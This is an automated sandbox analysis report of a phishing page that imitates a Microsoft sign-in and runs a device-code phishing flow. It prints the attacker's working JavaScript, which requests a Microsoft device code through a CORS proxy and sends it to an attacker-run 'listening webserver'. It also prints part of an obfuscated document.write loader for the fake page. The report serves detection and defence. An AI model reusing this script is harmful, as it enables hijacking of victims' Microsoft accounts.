Edit tour

Windows Analysis Report
https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML

Overview

General Information

Sample URL:	https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML
Analysis ID:	1592365
Infos:

Detection

HTMLPhisher

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected HtmlPhish10

Yara detected HtmlPhish29

Yara detected HtmlPhish44

Yara detected obfuscated html page

AI detected landing page (webpage, office document or email)

AI detected suspicious Javascript

HTML page contains obfuscated javascript

HTML body contains low number of good links

HTML title does not match URL

Classification

Process Tree

System is w10x64

chrome.exe (PID: 1748 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2232,i,3775122873185962186,10663787644327668169,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_68	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security
dropped/chromecache_68	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security

HTML

Source	Rule	Description	Author
1.0.pages.csv	JoeSecurity_HtmlPhish_29	Yara detected HtmlPhish_29	Joe Security
1.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.1.pages.csv	JoeSecurity_HtmlPhish_29	Yara detected HtmlPhish_29	Joe Security
1.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML

Avira URL Cloud: detection malicious, Label: phishing

Phishing

Yara detected HtmlPhish10

Source: Yara match	File source: 1.0.pages.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML

Yara detected HtmlPhish29

Source: Yara match	File source: 1.0.pages.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML

Yara detected HtmlPhish44

Source: Yara match

File source: dropped/chromecache_68, type: DROPPED

Yara detected obfuscated html page

Source: Yara match

File source: dropped/chromecache_68, type: DROPPED

AI detected landing page (webpage, office document or email)

Source: https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML

Joe Sandbox AI: Page contains button: 'Verify' Source: '1.0.pages.csv'

AI detected suspicious Javascript

Source: 0.0.id.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: https://m3ins.azurewebsites.net/?user-agent=Mozill... This script exhibits several high-risk behaviors that are indicative of malicious intent. It uses the `document.write()` function to dynamically insert HTML content, which can be used to execute remote or dynamic code. The content is also heavily obfuscated, making it difficult to analyze the true purpose of the script. Additionally, the script appears to be setting various meta tags and other elements that could be used for data exfiltration or other malicious activities. Overall, the combination of dynamic code execution, obfuscation, and suspicious metadata suggests a high-risk script that should be further investigated.

HTML page contains obfuscated javascript

Source: https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML

HTTP Parser: document.write(unescape('%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%3E%20%3C%68%74%6D%6C%20%64%

Source: https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML	HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/deviceauth	HTTP Parser: Number of links: 0

Source: https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML	HTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/deviceauth	HTTP Parser: Title: Sign in to your account does not match URL

Source: https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML	HTTP Parser: No <meta name="author".. found
Source: https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML	HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/deviceauth	HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/deviceauth	HTTP Parser: No <meta name="author".. found

Source: https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML	HTTP Parser: No <meta name="copyright".. found
Source: https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML	HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/deviceauth	HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/deviceauth	HTTP Parser: No <meta name="copyright".. found

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /get?url=https%3A%2F%2Flogin.microsoftonline.com%2Fcommon%2Foauth2%2Fdevicecode%3Fapi-version%3D1.0%26client_id%3Dd3590ed6-52b3-4102-aeff-aad2292ab01c%26resource%3Dhttps%3A%2F%2Fgraph.windows.net HTTP/1.1Host: api.allorigins.winConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, /; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://m3ins.azurewebsites.netSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /get?url=https%3A%2F%2Flogin.microsoftonline.com%2Fcommon%2Foauth2%2Fdevicecode%3Fapi-version%3D1.0%26client_id%3Dd3590ed6-52b3-4102-aeff-aad2292ab01c%26resource%3Dhttps%3A%2F%2Fgraph.windows.net HTTP/1.1Host: api.allorigins.winConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: m3ins.azurewebsites.net
Source: global traffic	DNS traffic detected: DNS query: api.allorigins.win
Source: global traffic	DNS traffic detected: DNS query: login.microsoftonline.com
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msftauth.net

Source: chromecache_60.2.dr	String found in binary or memory: https://login.microsoftonline.com
Source: chromecache_60.2.dr	String found in binary or memory: https://login.windows-ppe.net

Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: classification engine

Classification label: mal92.phis.win@17/33@12/6

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2232,i,3775122873185962186,10663787644327668169,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2232,i,3775122873185962186,10663787644327668169,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	2 Browser Extensions	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML	100%	Avira URL Cloud	phishing

Name	IP	Active	Malicious	Reputation
s-part-0016.t-0009.t-msedge.net	13.107.246.44	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
www.google.com	142.250.185.132	true	false	high
api.allorigins.win	188.114.97.3	true	false	high
m3ins.azurewebsites.net	unknown	unknown	true	unknown
aadcdn.msftauth.net	unknown	unknown	false	high
login.microsoftonline.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://login.microsoftonline.com/common/oauth2/deviceauth	false	high
https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML	true	unknown
https://api.allorigins.win/get?url=https%3A%2F%2Flogin.microsoftonline.com%2Fcommon%2Foauth2%2Fdevicecode%3Fapi-version%3D1.0%26client_id%3Dd3590ed6-52b3-4102-aeff-aad2292ab01c%26resource%3Dhttps%3A%2F%2Fgraph.windows.net	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://login.microsoftonline.com	chromecache_60.2.dr	false		high
https://login.windows-ppe.net	chromecache_60.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.132	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
188.114.97.3	api.allorigins.win	European Union	13335	CLOUDFLARENETUS	false
188.114.96.3	unknown	European Union	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4
192.168.2.5

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592365
Start date and time:	2025-01-16 01:44:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.phis.win@17/33@12/6
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.16.195, 142.250.185.174, 108.177.15.84, 142.250.184.206, 216.58.212.174, 216.58.206.46, 20.49.104.53, 142.250.184.234, 142.250.185.106, 172.190.213.174, 20.76.201.171, 20.70.246.20, 20.112.250.133, 20.236.44.162, 20.231.239.246, 95.101.149.131, 40.126.32.138, 40.126.32.140, 20.190.160.22, 40.126.32.134, 20.190.160.17, 20.190.160.20, 40.126.32.133, 20.190.160.14, 217.20.57.34, 2.23.209.34, 2.23.209.17, 40.126.32.76, 40.126.32.72, 40.126.32.74, 2.23.77.188, 142.250.186.170, 142.250.186.138, 172.217.18.10, 216.58.212.170, 142.250.185.202, 216.58.206.74, 142.250.186.42, 142.250.185.170, 142.250.185.138, 142.250.185.234, 172.217.23.106, 172.217.16.202, 142.250.186.74, 142.250.185.74, 142.250.185.110, 216.58.206.78, 142.250.186.46, 172.217.18.14, 142.250.186.174, 142.250.185.67, 142.250.186.78, 142.250.185.142, 142.250.185.238, 52.138.229.66, 52.178.17.3, 184.28.90.27, 4.245.163.56, 13.107.246.44, 13.107.246.45
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, waws-prod-blu-287-d32d.eastus.cloudapp.azure.com, e13678.dscb.akamaiedge.net, www.tm.aadcdn.msftauth.trafficmanager.net, www.tm.lg.prod.aadmsa.akadns.net, clientservices.googleapis.com, _8443._https.m3insdevices.eastus.cloudapp.azure.com, ak.privatelink.msidentity.com, onedscolprdneu14.northeurope.cloudapp.azure.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, www.microsoft.com-c-3.edgekey.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, update.googleapis.com, login.mso.msidentity.com, www.tm.ak.prd.aadg.trafficmanager.net, e329293.dscd.akamaiedge.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, m3insdevices.eastus.cloudapp.azure.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.ne
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML

Input	Output
URL: https://m3ins.azurewebsites.net Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": true, "reasoning": "This is a legitimate Microsoft Azure web hosting URL using azurewebsites.net domain, which is Microsoft's platform-as-a-service offering. While it is third-party hosting, it's a trusted Microsoft service." }
URL: https://m3ins.azurewebsites.net
URL: https://m3ins.azurewebsites.net/?user-agent=Mozill... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The script demonstrates moderate-risk behaviors, including external data transmission and the use of a CORS proxy to bypass same-origin policy restrictions. While the intent appears to be related to authentication and authorization, the use of a third-party CORS proxy and the lack of transparency around the destination server raise some concerns. Further review may be necessary to determine the full scope and purpose of the script." }
// Redirect CORS using corsproxy.io $.getJSON("https://api.allorigins.win/get?url=" + encodeURIComponent("https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net")).done(function(data) { console.log(data); data = JSON.parse(data.contents); console.log(data); document.getElementById('code').innerHTML += data.message; // Change this line to point to your listening webserver $.ajax({ url: "https://m3insdevices.eastus.cloudapp.azure.com:8443/?id=" + data.device_code, method: "GET", crossDomain: true }); let message = data.message; console.log(message); // Use regex to find the URL let urlMatch = message.match(/(https?:\/\/[^\s]+)/g); if (urlMatch && urlMatch.length > 0) { // Found a URL let url = urlMatch[0]; let urlWithLink = `<a href="${url}" target="_blank">${url}</a>`; // Replace URL in the message with the new URL (which includes the link) message = message.replace(url, urlWithLink); } // Use regex to find the code let codeMatch = message.match(/\b[A-Z0-9]{1,9}\b/); if (codeMatch && codeMatch.length > 0) { // Found a code let code = codeMatch[0]; let boldCode = `<strong>${code}</strong>`; // Replace code in the message with the bolded code message = message.replace(code, boldCode); } // Display the result document.getElementById('code').innerHTML = message; });
URL: https://m3ins.azurewebsites.net/?user-agent=Mozill... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "This script exhibits several high-risk behaviors that are indicative of malicious intent. It uses the `document.write()` function to dynamically insert HTML content, which can be used to execute remote or dynamic code. The content is also heavily obfuscated, making it difficult to analyze the true purpose of the script. Additionally, the script appears to be setting various meta tags and other elements that could be used for data exfiltration or other malicious activities. Overall, the combination of dynamic code execution, obfuscation, and suspicious metadata suggests a high-risk script that should be further investigated." }
document.write(unescape('%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%3E%20%3C%68%74%6D%6C%20%64%69%72%3D%6C%74%72%20%63%6C%61%73%73%20%6C%61%6E%67%3D%65%6E%3E%3C%6D%65%74%61%20%63%68%61%72%73%65%74%3D%75%74%66%2D%38%3E%0A%3C%74%69%74%6C%65%3E%53%69%67%6E%20%69%6E%20%74%6F%20%79%6F%75%72%20%61%63%63%6F%75%6E%74%3C%2F%74%69%74%6C%65%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%58%2D%55%41%2D%43%6F%6D%70%61%74%69%62%6C%65%20%63%6F%6E%74%65%6E%74%3D%22%49%45%3D%65%64%67%65%22%3E%0A%3C%6D%65%74%61%20%6E%61%6D%65%3D%76%69%65%77%70%6F%72%74%20%63%6F%6E%74%65%6E%74%3D%22%77%69%64%74%68%3D%64%65%76%69%63%65%2D%77%69%64%74%68%2C%20%69%6E%69%74%69%61%6C%2D%73%63%61%6C%65%3D%31%2E%30%2C%20%6D%61%78%69%6D%75%6D%2D%73%63%61%6C%65%3D%32%2E%30%2C%20%75%73%65%72%2D%73%63%61%6C%61%62%6C%65%3D%79%65%73%22%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%50%72%61%67%6D%61%20%63%6F%6E%74%65%6E%74%3D%6E%6F%2D%63%61%63%68%65%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%45%78%70%69%72%65%73%20%63%6F%6E%74%65%6E%74%3D%2D%31%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%78%2D%64%6E%73%2D%70%72%65%66%65%74%63%68%2D%63%6F%6E%74%72%6F%6C%20%63%6F%6E%74%65%6E%74%3D%6F%6E%3E%0A%3C%6D%65%74%61%20%6E%61%6D%65%3D%50%61%67%65%49%44%20%63%6F%6E%74%65%6E%74%3D%43%6F%6E%76%65%72%67%65%64%52%65%6D%6F%74%65%43%6F%6E%6E%65%63%74%3E%0A%3C%6D%65%74%61%20%6E%61%6D%65%3D%53%69%74%65%49%44%20%63%6F%6E%74%65%6E%74%3E%0A%3C%6D%65%74%61%20%6E%61%6D%65%3D%52%65%71%4C%43%20%63%6F%6E%74%65%6E%74%3D%31%30%33%33%3E%0A%3C%6D%65%74%61%20%6E%61%6D%65%3D%4C%6F%63%4C%43%20%63%6F%6E%74%65%6E%74%3D%65%6E%2D%55%53%3E%0A%3C%6D%65%74%61%20%6E%61%6D%65%3D%66%6F%72%6D%61%74%2D%64%65%74%65%63%74%69%6F%6E%20%63%6F%6E%74%65%6E%74%3D%22%74%65%6C%65%70%68%6F%6E%65%3D%6E%6F%22%3E%0A%0A%3C%6D%65%74%61%20%6E%61%6D%65%3D%72%6F%62%6F%74%73%20%63%6F%6E%74%65%6E%74%3D%6E%6F%6E%65%3E%0A%3C%73%74%79%6C%65%3E%68%74%6D%6C%7B%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%73%61%6E%73%2D%73%65%72%69%66%3B%2D%6D%73%2D%74%65%78%74%2D%73%69%7A%65%2D%61%64%6A%75%73%74%3A%31%30%30%25%3B%2D%77%65%62%6B%69%74%2D%74%65%78%74%2D%73%69%7A%65%2D%61%64%6A%75%73%74%3A%31%30%30%25%7D%62%6F%64%79%7B%6D%61%72%67%69%6E%3A%30%7D%61%7B%62%61%63%6B%67%72%6F%75%6E%64%2D%63%6F%6C%6F%72%3A%74%72%61%6E%73%70%61%72%65%6E%74%7D%61%3A%61%63%74%69%76%65%2C%61%3A%68%6F%76%65%72%7B%6F%75%74%6C%69%6E%65%3A%30%7D%69%6D%67%7B%62%6F%72%64%65%72%3A%30%7D%69%6E%70%75%74%7B%63%6F%6C%6F%72%3A%69%6E%68%65%72%69%74%3B%66%6F%6E%74%3A%69%6E%68%65%72%69%74%3B%6D%61%72%67%69%6E%3A%30%7D%69%6E%70%75%74%5B%74%79%70%65%3D%22%73%75%62%6D%69%74%22%5D%7B%2D%77%65%62%6B%69%74%2D%61%70%70%65%61%72%61%6E%63%65%3A%62%75%74%74%6F%6E%3B%63%75%72%73%6F%72%3A%70%6F%69%6E%74%65%72%7D%2A%7B%2D%77%65%62%6B%69%74%2D%62%6F%78%2D%73%69%7A%69%6E%67%3A%62%6F%72%64%65%72%2D%62%6F%78%3B%2D%6D%6F%7A%2D%62%6F%78%2D%73%69%7A%69%6E%67%3A%62%6F%72%64%65%72%2D%62%6F%78%3B%62%6F%78%2D%73%69%7A%69%6E%67%3A%62%6F%72%64%65%72%2D%62%6F%78%7D%2A%3A%62%65%66%6F%72%65%2C%2A%3A%61%66%74%65%72%7B%2D%77%65%62%6B%69%74%2D%62%6F%78%2D%73%69%7A%69%6E%67%3A%62%6F%72%64%65%72%2D%62%6F%78%3B%2D%6D%6F%7A%2D%62%6F%78%2D%73%69%7A%69%6E%67%3A%62%6F%72%64%65%72%2D%62%6F%78%3B%62%6F%78%2D%73%69%7A%69%6E%67%3A%62%6F%72%64%65%72%2D%62%6F%78%7D%69%6E%70%75%74%7B%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%69%6E%68%65%72%69%74%3B%66%6F%6E%74%2D%73%69%7A%65%3A%69%6E%68%65%72%69%74%7D%61%3A%66%6F%63%75%73%7B%6F%75%74%6C%69%6E%65%3A%74%68%69%6E%20%64%6F%74%74%65%64%3B%6F%75%74%6C%69%6E%65%2D%6F%66%66%73%65%74%3A%2D%32%70%78%3B%6F%75%74%6C%69%6E%65%3A%35%70%78%20%61%75%74%6F%20%2D%77%65%62%6B%69%74%2D%66%6F%63%75%73%2D%72%69%6E%67%2D%63%6F%6C%6F%72%7D%69%6D%67%7B%76%65%72%74%69%63%61%6C%2D%61%6C%69%67%6E%3A%6D%69%64%64%6C%65%7D%68%74%6D%6C%7B%66%6F%6E%74%2D%73%69%7A%65%3A%31%30%30%25%7D%62%6F%64%79%7B%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%22%53%65%67%6F%65%20%55%49%20%57%65%62%66%6F%6E%74%22%2C%2D%61%70%70%6C%65%2D%73%79%73%74%65%6D%2C%22%48%65%6C%76%65%74%69%63%61%20%4E%65%75%65%22%2C%22%4
URL: https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Verify Identity", "prominent_button_name": "Verify", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://m3ins.azurewebsites.net/?user-agent=Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://login.microsoftonline.com/common/oauth2/deviceauth Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Enter code to allow access", "prominent_button_name": "Next", "text_input_field_labels": "Code", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://login.microsoftonline.com/common/oauth2/deviceauth Model: Joe Sandbox AI	{ "brands": "unknown" }
